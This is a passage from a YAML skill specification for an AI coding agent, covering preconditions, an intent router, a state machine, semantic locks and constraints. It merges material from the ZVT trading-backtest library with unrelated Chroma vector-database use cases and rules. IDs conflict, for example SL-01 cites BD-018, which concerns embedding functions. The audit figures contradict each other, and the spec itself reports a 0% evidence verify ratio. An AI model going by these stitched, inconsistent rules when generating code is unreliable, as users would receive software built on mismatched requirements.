  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: null
    evidence_verify_ratio: null
    evidence_invalid: 0
    evidence_verified: null
    evidence_auto_fixed: null
    audit_coverage: 20 finance-universal not_applicable + 6 AIL items + 5 DAT items = 31 items reviewed across applicable
      scope
    audit_pass_rate: 3/11 (27% applicable items pass; 8 warn/fail/missing capture the architectural boundaries and divergences
      worth surfacing as constraints)
    audit_fail_total: 0
    audit_finance_universal:
      pass: 0
      warn: 0
      fail: 0
    audit_subdomain_totals:
      pass: 0
      warn: 0
      fail: 0
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  - id: EQ-02
    trigger: always
    action: MUST prepend user_disclosure_template (translated to user locale) to first user-facing response
    violation_code: EQ-02-V
    violation_signal: First agent response to user does not contain audit warning phrase
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-138. Evidence verify ratio
    = 0.0% and audit fail total = 0. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-138-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-001
    name: RAG basics (chat-with-your-documents)
    positive_terms:
    - RAG
    - chat with documents
    - context-augmented generation
    - question answering
    data_domain: text + metadata
    negative_terms:
    - multimodal
    - agentic memory
    - image
    ambiguity_question: If user mentions image/audio → UC-004 multimodal; if user mentions 'agent memory' → consider mem0
      (finance-bp-131), not chroma directly
  - uc_id: UC-002
    name: Where-Filter metadata-scoped retrieval
    positive_terms:
    - where filter
    - metadata filtering
    - $eq
    - $gt
    - $in
    - $nin
    - metadata filter
    data_domain: metadata + vectors
    negative_terms:
    - full-text search
    - FTS
    - regex
    ambiguity_question: If user wants substring/regex → use where_document $contains or Cloud's FTS index
  - uc_id: UC-003
    name: Local persistent database (PersistentClient)
    positive_terms:
    - PersistentClient
    - persistence
    - local database
    - single node
    - persistence
    data_domain: vectors + metadata
    negative_terms:
    - distributed
    - cloud
    - HttpClient
    ambiguity_question: Multi-machine or Cloud → use HttpClient/CloudClient
  - uc_id: UC-004
    name: Multimodal retrieval (text + image)
    positive_terms:
    - multimodal
    - image
    - CLIP
    - OpenCLIP
    - text-image retrieval
    data_domain: text + image + URI metadata
    negative_terms:
    - RAG
    - text-only
    - documents
    ambiguity_question: Pure text → UC-001
  - uc_id: UC-005
    name: Server-side embedding (thin client)
    positive_terms:
    - server-side embedding
    - thin client
    - HttpClient
    - remote EF
    data_domain: text + metadata
    negative_terms:
    - local
    - in-process
    - PersistentClient
    ambiguity_question: In-process embedding → EphemeralClient + DefaultEmbeddingFunction
  - uc_id: UC-006
    name: Custom Embedding Function
    positive_terms:
    - custom embedding
    - EmbeddingFunction
    - alternative embedding
    - OpenAI EF
    - Cohere EF
    data_domain: text + custom vectors
    negative_terms:
    - default embedding
    ambiguity_question: Default fits → no custom EF needed
  - uc_id: UC-007
    name: Collection Forking (zero-copy snapshot)
    positive_terms:
    - fork
    - snapshot
    - branch collection
    - version
    data_domain: Cloud metadata
    negative_terms:
    - local
    - OSS
    - PersistentClient
    ambiguity_question: OSS users use export/import workflows
  - uc_id: UC-008
    name: Production Deployment (Docker / Terraform / systemd)
    positive_terms:
    - deployment
    - Terraform
    - Docker
    - systemd
    - production
    data_domain: deployment configuration
    negative_terms:
    - EphemeralClient
    - Colab
    - prototype
    ambiguity_question: Prototype → EphemeralClient; local persistent → PersistentClient
  - uc_id: UC-009
    name: Observability / OTel Monitoring
    positive_terms:
    - observability
    - OTel
    - tracing
    - metrics
    - monitoring
    data_domain: ops signals
    negative_terms:
    - client-only
    - EphemeralClient
    ambiguity_question: Client-only → use local logging
  - uc_id: UC-010
    name: Cloud Task API (async batch jobs)
    positive_terms:
    - task
    - async
    - batch
    - long-running
    data_domain: Cloud tasks
    negative_terms:
    - EphemeralClient
    - PersistentClient
    - OSS
    ambiguity_question: Local has no task API
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 24
    fatal_constraints_count: 3
    non_fatal_constraints_count: 49
    use_cases_count: 10
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 7 source groups: api_layer(3),
        client_factory(2), cross_cutting(4), embedding_function(2), index(7), persistence(4), and 1 more.'
      key_decisions: 24 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-013
      type: B
      summary: Default chroma_api_impl = RustBindingsAPI since v1.0.0 (March 2025)
    - id: BD-016
      type: B
      summary: $ne / $nin / $not_contains semantics changed in v0.5.12 — now match records where the key does not exist
    - id: BD-019
      type: B
      summary: list_collections returns Sequence[Collection] (v1.0.0 reverted v0.6.0's name-only behavior)
    - id: BD-012
      type: RC/B
      summary: Chroma Cloud quotas — dim≤4096 / doc≤16KB / URI≤256B / ID≤128B / metadata key≤36B / metadata value≤8182B (record)
        256B (collection) / metadata keys≤32 / where predicates≤8 / n_results≤300 / records/wr
    - id: BD-020
      type: B
      summary: Async surface is HTTP-only — no AsyncEphemeralClient / AsyncPersistentClient / AsyncRustClient
    - id: BD-021
      type: missing
      summary: No EF–normalization mismatch detection when user supplies space=cosine with custom un-normalized EF
    - id: BD-022
      type: missing
      summary: Embedding-dimension change requires manual create-new-collection + re-add (no in-place migration helper)
    - id: BD-023
      type: missing
      summary: No EmbeddingFunction persistence — multi-process consumers can silently disagree on which EF backs a collection
    - id: BD-024
      type: missing
      summary: No detection that user is on Rust default but configured Python-only legacy settings
    - id: BD-010
      type: B/M
      summary: Default EmbeddingFunction = ONNXMiniLM_L6_V2 (all-MiniLM-L6-v2)
    - id: BD-018
      type: B/T
      summary: EmbeddingFunction is not persisted into collection metadata
    - id: BD-001
      type: B/BA
      summary: Source-level default distance metric is `l2`, but built-in EFs override to `cosine` via default_space() at
        collection-create time
    - id: BD-002
      type: M/BA
      summary: Cosine implementation is `1 - dot(a,b)` and assumes pre-normalized vectors
    - id: BD-003
      type: B
      summary: Filter is PRE-vector — where-clause produces allowed_ids before HNSW search
    - id: BD-004
      type: B/BA
      summary: HNSW default M=16 / ef_construction=100 / ef_search=100
    - id: BD-005
      type: B/BA
      summary: default_batch_size=100, sync_threshold=1000 (HNSW batch + persistence cadence)
    - id: BD-006
      type: B
      summary: HNSW dimension is latched at first write — no in-place dim change
    - id: BD-017
      type: B
      summary: Static vs dynamic HNSW parameters governed by collection_configuration.UpdateHNSWConfiguration (NOT legacy
        configuration.is_static path)
    - id: BD-007
      type: T
      summary: Local persistence uses SQLite + on-disk HNSW files (not embedded KV like LMDB/RocksDB in single-node mode)
    - id: BD-011
      type: B/T
      summary: max_batch_size is dynamic — inferred from SQLite MAX_VARIABLE_NUMBER PRAGMA / 6
    - id: BD-014
      type: T/RC
      summary: SQLite ≥ 3.35.0 is a hard startup requirement — raises ImportError if older
    - id: BD-015
      type: B
      summary: WAL pruning is automatic since v0.5.6; pre-v0.5.6 DBs need one-time `chroma utils vacuum` on upgrade
    - id: BD-008
      type: B/T
      summary: Distributed mode adds a 3rd segment (BLOCKFILE_RECORD) separating record body from metadata index
    - id: BD-009
      type: B
      summary: Local default vector segment is HNSW_LOCAL_MEMORY; switches to HNSW_LOCAL_PERSISTED only when is_persistent=True
resources:
  packages:
  - name: hnswlib (chroma-core fork)
    version_pin: latest
  - name: pysqlite3-binary
    version_pin: latest
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install hnswlib (chroma-core fork)
    - python3 -m pip install pysqlite3-binary
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: chroma-C-005
    when: Switching the EmbeddingFunction on an existing collection (e.g. ada-002 1536d → text-embedding-3-large 3072d).
    action: Do NOT expect in-place dimension changes — you must create_collection(new_name) with the new EF, iterate the old
      collection regenerating all vectors, and write to the new collection.
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: Dimensionality is latched at first write (local_hnsw.py:222-233 _ensure_index sets _dimensionality; mismatched
      dim then raises InvalidDimensionException). HNSW graph structure is dim-bound and not resizable. Forcing different-dim
      writes raises a hard exception and the entire batch rolls back.
    stage_ids:
    - index
    - embedding_function
    derived_from_bd_id: BD-006
  - id: chroma-C-019
    when: Deploying Chroma outside Colab (production servers, Docker images, local dev).
    action: First confirm the host system has sqlite3.sqlite_version_info ≥ (3, 35, 0); if not, install pysqlite3-binary and
      swap it manually — outside Colab, chromadb does not auto hot-swap.
    severity: fatal
    kind: resource_boundary
    modality: must
    consequence: chromadb/__init__.py:137-155 checks the SQLite version at import time; below 3.35.0 it raises RuntimeError
      on the non-Colab path, and the entire chromadb module fails to import.
    stage_ids:
    - persistence
    derived_from_bd_id: BD-014
  - id: chroma-C-024
    when: Deploying a Chroma v1.0.0+ server to production.
    action: Do NOT rely on Chroma's built-in auth provider — since v1.0.0 the server no longer ships built-in auth; you must
      front it with a reverse proxy (nginx/Traefik) or an external auth gateway.
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: If you configure chroma_server_auth_provider per old docs, v1.0.0+ images will not enable any auth and the
      service may be fully open, exposing it to unauthenticated access.
    stage_ids:
    - client_factory
    - api_layer
  regular:
  - id: chroma-C-001
    when: Implementing a Chroma custom EmbeddingFunction intended for the cosine distance path.
    action: Implement default_space() returning 'cosine' on the custom EF class, and L2-normalize at the __call__ output (vec
      / np.linalg.norm(vec)).
    severity: high
    kind: domain_rule
    modality: must
    consequence: When the custom EF does not implement default_space(), create_collection's fallback path writes space='l2'
      (collection_configuration.py:442); the user expects cosine retrieval but gets l2, and recall is completely different.
      When the EF returns un-normalized vectors with cosine selected, cosine_distance_scalar=1-dot may return negative values
      or values >2 (illegal distances).
    stage_ids:
    - index
    - embedding_function
    derived_from_bd_id: BD-001
  - id: chroma-C-002
    when: Calling chromadb.Client().create_collection(name=...) without passing embedding_function and without setting hnsw:space
      in metadata.
    action: Do NOT assume the default distance is cosine — under this path collection_configuration.py:442 hits the fallback
      and space is written as 'l2' (squared L2 norm, no sqrt).
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Text-similarity tasks under l2 distance produce different rankings than cosine (especially when vector magnitudes
      vary), so callers expecting 'cosine default for text' silently get l2 results and recall quality degrades noticeably.
    stage_ids:
    - index
    derived_from_bd_id: BD-001
  - id: chroma-C-003
    when: Choosing space='cosine' for a Chroma collection and inserting custom embeddings.
    action: L2-normalize all vectors (v / np.linalg.norm(v)) BEFORE writing and querying — do not assume Chroma will normalize
      internally.
    severity: high
    kind: domain_rule
    modality: must
    consequence: rust/distance/src/distance.rs:9-15 cosine_distance_scalar implements `1 - sum(a[i]*b[i])` with no division
      by magnitude. Un-normalized vectors yield mathematically meaningless distances (possibly negative, >2, or NaN), and
      similarity ranking breaks completely.
    stage_ids:
    - index
    derived_from_bd_id: BD-002
  - id: chroma-C-004
    when: Reading the cosine distance formula in docs/mintlify/docs/collections/configure.mdx.
    action: Do NOT infer from the formula `d = 1 - (ΣAB) / (√ΣA² · √ΣB²)` that Chroma auto-normalizes vectors — the doc shows
      the math definition, but rust/distance/src/distance.rs:9-15 implements `1 - dot(a,b)` and skips the denominator.
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: 'Doc/code semantics disagree: the doc suggests Chroma divides by magnitudes, but the code does not. Feeding
      un-normalized vectors yields wrong distances with no error or warning, and recall drifts entirely off-target.'
    stage_ids:
    - index
    derived_from_bd_id: pitfall-005
  - id: chroma-C-006
    when: Calling Chroma collection.query(query_embeddings=..., where={...}, n_results=K) where the where-clause is highly
      selective (hit rate < 1%).
    action: Estimate the where-hit count via metadata segment first; when hits < n_results × 10, cap n_results to hits/10;
      OR set ef_construction=400, M=32 at create_collection time and bump ef_search to 400 via collection.modify(configuration=Configuration(hnsw=UpdateHNSWConfiguration(ef_search=400))).
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: 'Chroma filtering is PRE-vector: where computes allowed_ids in the metadata segment first, then feeds them
      to HNSW.query. With high selectivity, the HNSW graph traversal cannot find k candidates inside the small subset, triggering
      ''Cannot return the results in a contiguous 2D array. Probably ef or M is too small'' — the query fails entirely.'
    stage_ids:
    - index
    derived_from_bd_id: BD-003
  - id: chroma-C-007
    when: 'Upgrading Chroma from < v1.0.0 to v1.0.0+ where the application config relies on any of: chroma_segment_cache_policy
      / chroma_memory_limit_bytes / chroma_server_thread_pool_size / chroma_server_nofile.'
    action: If those settings must take effect, explicitly set chroma_api_impl='chromadb.api.segment.SegmentAPI' in Settings
      (forcing the Python path); otherwise the v1.0.0+ default RustBindingsAPI silently ignores all four.
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Since v1.0.0 chroma_api_impl defaults to RustBindingsAPI (config.py:120). The Rust path does not read these
      four settings; the fields still exist in config.py but only the Python LocalSegmentManager (local.py:73-77) and the
      FastAPI server (fastapi/__init__.py:205) consume them — and neither is the default. Cache/memory/threadpool tuning becomes
      a silent no-op and observed performance diverges sharply from expectation.
    stage_ids:
    - api_layer
    derived_from_bd_id: BD-013
  - id: chroma-C-008
    when: Writing async (asyncio) Chroma client code that uses local persistence (PersistentClient/EphemeralClient/RustClient).
    action: Do NOT try to import AsyncPersistentClient or AsyncEphemeralClient — those classes do not exist. Either switch
      to AsyncHttpClient (HTTP mode), or wrap the sync local client in asyncio.to_thread().
    severity: high
    kind: architecture_guardrail
    modality: must_not
    consequence: chromadb exposes only AsyncHttpClient as an async entry point (__init__.py:312-368); the other four local
      factories are sync. Calling `await EphemeralClient().add(...)` raises TypeError or AttributeError, and long queries
      block the event loop.
    stage_ids:
    - client_factory
    derived_from_bd_id: BD-020
  - id: chroma-C-009
    when: Implementing a Chroma DB migration script or other code that must force the Rust implementation.
    action: Use the chromadb.RustClient(...) factory — it forces chroma_api_impl='chromadb.api.rust.RustBindingsAPI' even
      if the user has overridden it in Settings, guaranteeing the Rust path.
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: If you instead use PersistentClient + Settings with chroma_api_impl=SegmentAPI, you take the Python legacy
      path instead of Rust, contradicting the migration intent. The RustClient factory exists precisely to bypass user overrides.
    stage_ids:
    - client_factory
  - id: chroma-C-010
    when: Writing Chroma v1.0.0+ code that iterates the current collection list and calls methods on each item.
    action: Do NOT assume list_collections() returns just names (the temporary v0.6.0 behaviour) — v1.0.0 reverted that change;
      list_collections() now returns Sequence[Collection], so you can iterate and call collection.add/.query directly.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: Code written for the v0.6.0 assumption gets list[str] and AttributeErrors when calling .add; calling get_collection
      again is a wasteful round-trip. v1.0.0 (2025-03) migration.mdx:32 explicitly states 'list_collections now reverts back
      to returning Collection objects'.
    stage_ids:
    - api_layer
    derived_from_bd_id: BD-019
  - id: chroma-C-011
    when: Implementing a custom ServerAPI by inheriting BaseAPI/ClientAPI.
    action: Implement all 53 @abstractmethod entries declared in chromadb/api/__init__.py:389 (ClientAPI sync path); for async
      support, additionally implement the 51 @abstractmethod entries in AsyncClientAPI in chromadb/api/async_api.py.
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Missing any abstractmethod implementation raises TypeError 'Can't instantiate abstract class ... with abstract
      method ...' at instantiation, rendering the entire client unusable.
    stage_ids:
    - api_layer
  - id: chroma-C-012
    when: Writing Chroma v0.5.12+ where-clauses with $ne / $nin / $not_contains.
    action: 'To preserve the pre-v0.5.11 ''match only records that have this key'' semantics, explicitly write `where={''$and'':
      [{''X'': {''$ne'': Y}}, {''X'': {''$exists'': True}}]}` — the new semantics also match records where the key is absent.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: v0.5.12 changed $ne / $nin / $not_contains to SQL-standard 'unknown is not equal' — key-absent records now
      count as not-equal. Migrating without adding the $exists check unintentionally pulls records lacking the field into
      results, derailing downstream business logic.
    stage_ids:
    - api_layer
    derived_from_bd_id: BD-016
  - id: chroma-C-013
    when: Writing Chroma v1.x code that dynamically tunes HNSW params (ef_search / num_threads / batch_size / sync_threshold
      / resize_factor).
    action: 'Use the new path: collection.modify(configuration=UpdateCollectionConfiguration(hnsw=UpdateHNSWConfiguration(ef_search=400)))
      (chromadb/api/collection_configuration.py:460); do NOT use the legacy chromadb/api/configuration.py:Configuration is_static
      path.'
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: The legacy configuration.py is_static flag marks batch_size/sync_threshold/resize_factor as static (immutable),
      contradicting configure.mdx:41-46 which describes them as runtime-tunable. The new collection_configuration.py:460 UpdateHNSWConfiguration
      TypedDict is the real 1.x runtime path; the old path may be deprecated or behave inconsistently.
    stage_ids:
    - index
    derived_from_bd_id: BD-017
  - id: chroma-C-014
    when: Writing a create_collection call for Chroma and filling in CreateHNSWConfiguration default params.
    action: If the dataset is ≤ 1M vectors and ~90% recall is acceptable, keep defaults max_neighbors=16, ef_construction=100,
      ef_search=100. For > 10M vectors set max_neighbors ≥ 32 and ef_construction ≥ 200; for high-recall workloads also set
      ef_search ≥ 200.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: The default M=16/ef=100 comes from the HNSW paper Pareto frontier under small-to-medium data + medium recall.
      At 10M+ records, M=16 recall drops noticeably (< 80%), and high-selectivity PRE-filter queries are much more likely
      to trigger the 'Cannot return contiguous 2D array' error (see chroma-C-006).
    stage_ids:
    - index
